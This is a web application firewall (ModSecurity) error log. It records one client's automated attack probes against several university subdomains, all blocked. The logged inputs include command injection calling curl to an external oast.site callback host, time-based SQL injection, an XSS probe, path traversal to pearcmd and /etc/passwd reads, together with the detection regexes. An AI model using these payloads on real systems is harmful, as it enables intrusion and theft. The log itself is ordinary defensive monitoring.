[Tue Aug 29 11:40:02.438383 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gjhmmu9uh39h71.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAaHMeUAAAAE"]
[Tue Aug 29 11:40:02.441639 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26g4tf3mng77p9mt.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcbR7YAAAAv"]
[Tue Aug 29 11:40:02.466723 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26grjd5yhtb1wurb.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcaVK8AAAAu"]
[Tue Aug 29 11:40:02.483006 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26g9duy9j7oyde6e.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcYUzgAAAAp"]
[Tue Aug 29 11:40:04.396635 2023] [:error] [pid 1803] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO12pMCo-f0AAAcL6yIAAAAM"]
[Tue Aug 29 11:40:05.517634 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAYlCRUAAAAP"]
[Tue Aug 29 11:40:05.524366 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAcjAgkAAAAw"]
[Tue Aug 29 11:40:05.637499 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAaJJ20AAAAJ"]
[Tue Aug 29 11:40:06.462877 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO12psCo-f0AAAXQKKIAAAAj"]
[Tue Aug 29 11:40:07.375491 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcPivUAAAAa"]
[Tue Aug 29 11:40:07.381069 2023] [:error] [pid 1815] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAcXk2AAAAAe"]
[Tue Aug 29 11:40:07.381411 2023] [:error] [pid 1699] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAaj7B8AAAAq"]
[Tue Aug 29 11:40:07.384740 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAaHMecAAAAE"]
[Tue Aug 29 11:40:07.388002 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAcaVLIAAAAu"]
[Tue Aug 29 11:40:07.389427 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAXQKKMAAAAj"]
[Tue Aug 29 11:40:07.389457 2023] [:error] [pid 1678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAaO3gAAAAAX"]
[Tue Aug 29 11:40:07.397070 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcPivYAAAAa"]
[Tue Aug 29 11:40:07.418975 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcYUz0AAAAp"]
[Tue Aug 29 11:40:07.422371 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAXbcKYAAAAL"]
[Tue Aug 29 11:40:09.368554 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12qcCo-f0AAAYh9d0AAAAK"]
[Tue Aug 29 11:40:09.378810 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gr63qpyuzhaaak.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12qcCo-f0AAAXYiZ8AAAAG"]
[Tue Aug 29 11:40:11.371783 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12q8Co-f0AAAaXqucAAAAl"]
[Tue Aug 29 11:40:11.404249 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12q8Co-f0AAAcaVLUAAAAu"]
[Tue Aug 29 11:40:12.371787 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAATZp7cAAAAf"]
[Tue Aug 29 11:40:12.408136 2023] [:error] [pid 1815] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAcXk2UAAAAe"]
[Tue Aug 29 11:40:12.467897 2023] [:error] [pid 1815] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAcXk2cAAAAe"]
[Tue Aug 29 11:40:12.490543 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAXYiaQAAAAG"]
[Tue Aug 29 11:40:12.491486 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAATZp7sAAAAf"]
